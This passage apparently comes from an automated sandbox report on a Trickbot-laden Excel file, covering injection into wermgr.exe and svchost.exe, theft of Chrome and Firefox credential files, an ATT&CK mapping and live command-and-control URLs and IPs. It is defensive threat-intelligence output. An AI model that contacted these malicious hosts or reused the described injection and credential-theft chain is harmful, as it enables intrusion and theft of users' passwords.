                Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00073070 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E15B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\System32\svchost.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E157DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00082060 SetCurrentDirectoryW,SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                Allocates memory in foreign processes
                Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
                Hijacks the control flow in another process
                Source: C:\Windows\System32\wermgr.exe Memory written: PID: 2296 base: 180106000 value: FF
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: 60000
                Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: FFC993F8
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 60000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 70000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: FF0E246C
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 20000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 180000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 180001000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1800DC000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 180106000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 18010C000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 180113000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 2C0000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 2D0000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 300000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1F30000
                Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1F50000
                Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer
                Source: wermgr.exe, 00000006.00000002.2357397155.0000000000860000.00000002.00000001.sdmp Binary or memory string: Program Manager
                Source: wermgr.exe, 00000006.00000002.2357397155.0000000000860000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000006.00000002.2357397155.0000000000860000.00000002.00000001.sdmp Binary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                Yara detected Trickbot
                Source: Yara match File source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY
                Yara detected Trickbot
                Source: Yara match File source: 00000004.00000002.2094061002.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000003.2089754481.00000000006C4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000003.2089764139.00000000006C4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2094284509.0000000000690000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2094761896.0000000002198000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 4.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
                Source: C:\Windows\System32\wermgr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSecurityPreloadState.txt
                Source: C:\Windows\System32\wermgr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultcompatibility.ini
                Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\System32\wermgr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultAlternateServices.txt
                Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
                Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
                Source: C:\Windows\System32\wermgr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSiteSecurityServiceState.txt
                Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                Remote Access Functionality:

                Yara detected Trickbot
                Source: Yara match File source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY
                Yara detected Trickbot
                Source: Yara match File source: 00000004.00000002.2094061002.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000003.2089754481.00000000006C4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000003.2089764139.00000000006C4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2094284509.0000000000690000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2094761896.0000000002198000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 4.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Techniques listed per tactic column (the digits after a technique name are the report's signature-count badges for that technique):

                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
                Execution: Scripting (21), Native API (1), Exploitation for Client Execution (33), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript
                Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
                Privilege Escalation: DLL Side-Loading (1), Extra Window Memory Injection (1), Access Token Manipulation (1), Process Injection (312), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
                Defense Evasion: Disable or Modify Tools (2), Scripting (21), Obfuscated Files or Information (2), DLL Side-Loading (1), Extra Window Memory Injection (1), Masquerading (121), Virtualization/Sandbox Evasion (1), Access Token Manipulation (1), Process Injection (312), Rundll32 (1)
                Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
                Discovery: File and Directory Discovery (2), System Information Discovery (115), Query Registry (1), Security Software Discovery (12), Virtualization/Sandbox Evasion (1), Process Discovery (4), Remote System Discovery (1), System Network Configuration Discovery (11), System Network Connections Discovery, Process Discovery
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content
                Collection: Archive Collected Data (1), Data from Local System (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
                Command and Control: Ingress Tool Transfer (2), Encrypted Channel (22), Non-Standard Port (1), Non-Application Layer Protocol (3), Application Layer Protocol (114), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
                Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
                Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
                Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact

                Behavior Graph

                Behavior Graph ID: 355598; Sample: SecuriteInfo.com.Exploit.Si...; Startdate: 20/02/2021; Architecture: WINDOWS; Score: 100

                Top-level network contacts and signatures: 190.239.34.181 (TelefonicadelPeruSAAPE, Peru); 154.0.134.130 (RTL-ASUG, Uganda); 4 other IPs or domains; Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Antivirus detection for URL or domain; 13 other signatures

                Process chain shown in the graph:

                • EXCEL.EXE (started): contacts www.chipmania.it / chipmania.it (185.81.0.78, 49165, 80, SERVERPLAN-ASIT, Italy); drops C:\Users\user\BASE.BABAA (PE32) and C:\Users\user\AppData\Local\...\10[1].jjkes (PE32); signatures: Document exploit detected (process start blacklist hit), Document exploit detected (UrlDownloadToFile); starts rundll32.exe
                • taskeng.exe (started): starts rundll32.exe
                • rundll32.exe (from EXCEL.EXE): starts a second rundll32.exe, which writes to foreign memory regions, allocates memory in foreign processes and starts two wermgr.exe instances
                • wermgr.exe (first instance): contacts 185.109.54.99 (447, 49174, OT-ASRO, Ukraine), 94.140.114.136 (443, NANO-ASLV, Latvia) and 8 other IPs or domains; signatures: Hijacks the control flow in another process, Tries to harvest and steal browser information (history, passwords, etc), Writes to foreign memory regions; starts svchost.exe
                • wermgr.exe (second instance): signatures: Tries to detect virtualization through RDTSC time measurements, Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
                • svchost.exe: contacts 116.68.162.92 (443, 49176, SDI-AS-IDPTSumberDataIndonesiaID, Indonesia); drops C:\Users\user\AppData\Local\...\Web Data.bak, C:\Users\user\AppData\...\Login Data.bak and C:\Users\user\AppData\Local\...\History.bak (SQLite); signature: Tries to harvest and steal browser information (history, passwords, etc)

                Screenshots


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | 11% | Virustotal |
                SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | 28% | ReversingLabs | Document-Word.Downloader.EncDoc

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | 6% | ReversingLabs | Win32.Trojan.Trickpak
                C:\Users\user\BASE.BABAA | 6% | ReversingLabs | Win32.Trojan.Trickpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                Source | Detection | Scanner | Label
                chipmania.it | 1% | Virustotal |
                www.chipmania.it | 2% | Virustotal |

                URLs

                Source | Detection | Scanner | Label
                http://109.69.4.201:443 | 0% | Avira URL Cloud | safe
                http://123.231.180.130:443 | 0% | Avira URL Cloud | safe
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//3 | 0% | Avira URL Cloud | safe
                http://ocsp.entrust.net03 | 0% | URL Reputation | safe
                http://www.chipmania.it/mails/open.php | 100% | Avira URL Cloud | malware
                http://116.68.162.92:443 | 0% | Avira URL Cloud | safe
                http://crl.use | 0% | Avira URL Cloud | safe
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/o | 0% | Avira URL Cloud | safe
                https://116.68.162.92:443/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ | 0% | Avira URL Cloud | safe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
                http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
                https://185.109.54.99:447/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/5/pwgrab64/ | 0% | Avira URL Cloud | safe
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST// | 0% | Avira URL Cloud | safe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
                http://190.239.34.181:443 | 0% | Avira URL Cloud | safe
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//W | 0% | Avira URL Cloud | safe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
                http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
                Https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/bnfhZJn91PhwAc8eqCIkI2c | 0% | Avira URL Cloud | safe
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/U | 0% | Avira URL Cloud | safe
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/ | 0% | Avira URL Cloud | safe
                http://154.0.134.130:443 | 0% | Avira URL Cloud | safe
                http://187.95.136.38:443 | 0% | Avira URL Cloud | safe
                http://logo.veri | 0% | Avira URL Cloud | safe
                http://www.%s.comPA | 0% | URL Reputation | safe
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DEBG//e | 0% | Avira URL Cloud | safe
                http://ocsp.entrust.net0D | 0% | URL Reputation | safe
                http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/jvvnxhpdjrND3fPr33rZPHh | 0% | Avira URL Cloud | safe
                http://45.184.189.34:443 | 0% | Avira URL Cloud | safe

                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                chipmania.it | 185.81.0.78 | true | false | | unknown
                wtfismyip.com | 95.217.228.176 | true | false | | high
                38.52.17.84.zen.spamhaus.org | unknown | unknown | false | | high
                38.52.17.84.cbl.abuseat.org | unknown | unknown | false | | high
                38.52.17.84.dnsbl-1.uceprotect.net | unknown | unknown | true | | unknown
                www.chipmania.it | unknown | unknown | true | | unknown
                38.52.17.84.b.barracudacentral.org | unknown | unknown | false | | high
                38.52.17.84.spam.dnsbl.sorbs.net | unknown | unknown | false | | high

                            Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://www.chipmania.it/mails/open.php | true | Avira URL Cloud: malware | unknown
                https://116.68.162.92:443/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ | true | Avira URL Cloud: safe | unknown
                http://wtfismyip.com/text | false | | high

                              URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.windows.com/pctv. | rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp | false | | high
                http://109.69.4.201:443 | wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
                http://123.231.180.130:443 | wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
                http://investor.msn.com | rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp | false | | high
                http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp | false | | high
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//3 | wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.entrust.net/server1.crl0 | wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | false | | high
                http://ocsp.entrust.net03 | wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                http://116.68.162.92:443 | wermgr.exe, 00000006.00000002.2362068163.0000000032D8C000.00000004.00000040.sdmp, wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.use | wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/o | wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                http://www.diginotar.nl/cps/pkioverheid0 | wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                https://185.109.54.99:447/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/5/pwgrab64/ | wermgr.exe, 00000006.00000002.2362554842.00000000333A0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST// | wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp | false | | high
                http://190.239.34.181:443 | wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp | false | | high
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//W | wermgr.exe, 00000006.00000002.2362536618.0000000033385000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | wermgr.exe, 00000006.00000002.2362599901.0000000033740000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2357215363.0000000000800000.00000002.00000001.sdmp | false | | high
                Https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/bnfhZJn91PhwAc8eqCIkI2c | wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/U | wermgr.exe, 00000006.00000002.2357267628.0000000000340000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/ | wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://154.0.134.130:443 | wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
                http://187.95.136.38:443 | wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
                http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp | false | | high
                http://logo.veri | wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.%s.comPA | wermgr.exe, 00000006.00000002.2362599901.0000000033740000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2357215363.0000000000800000.00000002.00000001.sdmp | false | URL Reputation: safe | low
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DEBG//e | wermgr.exe, 00000006.00000002.2362530513.000000003337E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://ocsp.entrust.net0D | wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                https://secure.comodo.com/CPS0 | wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | false | | high
                http://servername/isapibackend.dll | wermgr.exe, 00000006.00000002.2363434960.0000000034070000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
                https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/jvvnxhpdjrND3fPr33rZPHh | wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                http://crl.entrust.net/2048ca.crl0 | wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp | false | | high
                http://45.184.189.34:443 | wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown

                                                  Contacted IPs


                                                  Public

                IP | Domain | Country | ASN | ASN Name | Malicious
                154.0.134.130 | unknown | Uganda | 37063 | RTL-ASUG | true
                123.231.180.130 | unknown | Indonesia | 4800 | LINTASARTA-AS-APNetworkAccessProviderandInternetServic | true
                185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false
                190.239.34.181 | unknown | Peru | 6147 | TelefonicadelPeruSAAPE | true
                45.184.189.34 | unknown | Brazil | 269347 | REDUTRAPROVEDORDEINTERNETBR | true
                185.109.54.99 | unknown | Ukraine | 199995 | OT-ASRO | true
                193.8.194.96 | unknown | United Kingdom | 53340 | FIBERHUBUS | true
                116.68.162.92 | unknown | Indonesia | 56246 | SDI-AS-IDPTSumberDataIndonesiaID | true
                94.140.114.136 | unknown | Latvia | 43513 | NANO-ASLV | true
                95.217.228.176 | unknown | Germany | 24940 | HETZNER-ASDE | false
                194.5.249.156 | unknown | Romania | 64398 | NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | false
                187.95.136.38 | unknown | Brazil | 262318 | HorizonsTelecomunicacoeseTecnologiaLtdaBR | true
                109.69.4.201 | unknown | Albania | 21183 | ABCOM-ASTiranaAlbaniaAL | true

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Emerald
                                                  Analysis ID:355598
                                                  Start date:20.02.2021
                                                  Start time:02:02:58
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 8m 24s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:SecuriteInfo.com.Exploit.Siggen3.10350.15803.23095 (renamed file extension from 23095 to xls)
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winXLS@14/18@8/13
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 7.6% (good quality ratio 4.8%)
                                                  • Quality average: 58.5%
                                                  • Quality standard deviation: 46.4%
                                                  HCA Information:
                                                  • Successful, ratio: 53%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer
                                                  Warnings:
                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                  • TCP Packets have been reduced to 100
                                                  • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                                  • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net

                                                  Simulations

                                                  Behavior and APIs

Time | Type | Description
02:03:44 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
02:03:44 | API Interceptor | 42x Sleep call for process: wermgr.exe modified
02:05:29 | API Interceptor | 154x Sleep call for process: taskeng.exe modified
02:05:37 | API Interceptor | 68x Sleep call for process: svchost.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

Match | Associated Sample Name / URL | Detection | Context

Match: 185.81.0.78 (all associated samples detected malicious; context: www.chipmania.it/mails/open.php)
• SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls
• SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls
• SecuriteInfo.com.Heur.1476.xls
• SecuriteInfo.com.Heur.1181.xls
• SecuriteInfo.com.Heur.21235.xls
• SecuriteInfo.com.Heur.15875.xls
• SecuriteInfo.com.Heur.21759.xls
• SecuriteInfo.com.Heur.2804.xls
• SecuriteInfo.com.Heur.1138.xls
• SecuriteInfo.com.Heur.11266.xls
• SecuriteInfo.com.Heur.18554.xls
• Sign-636.xls
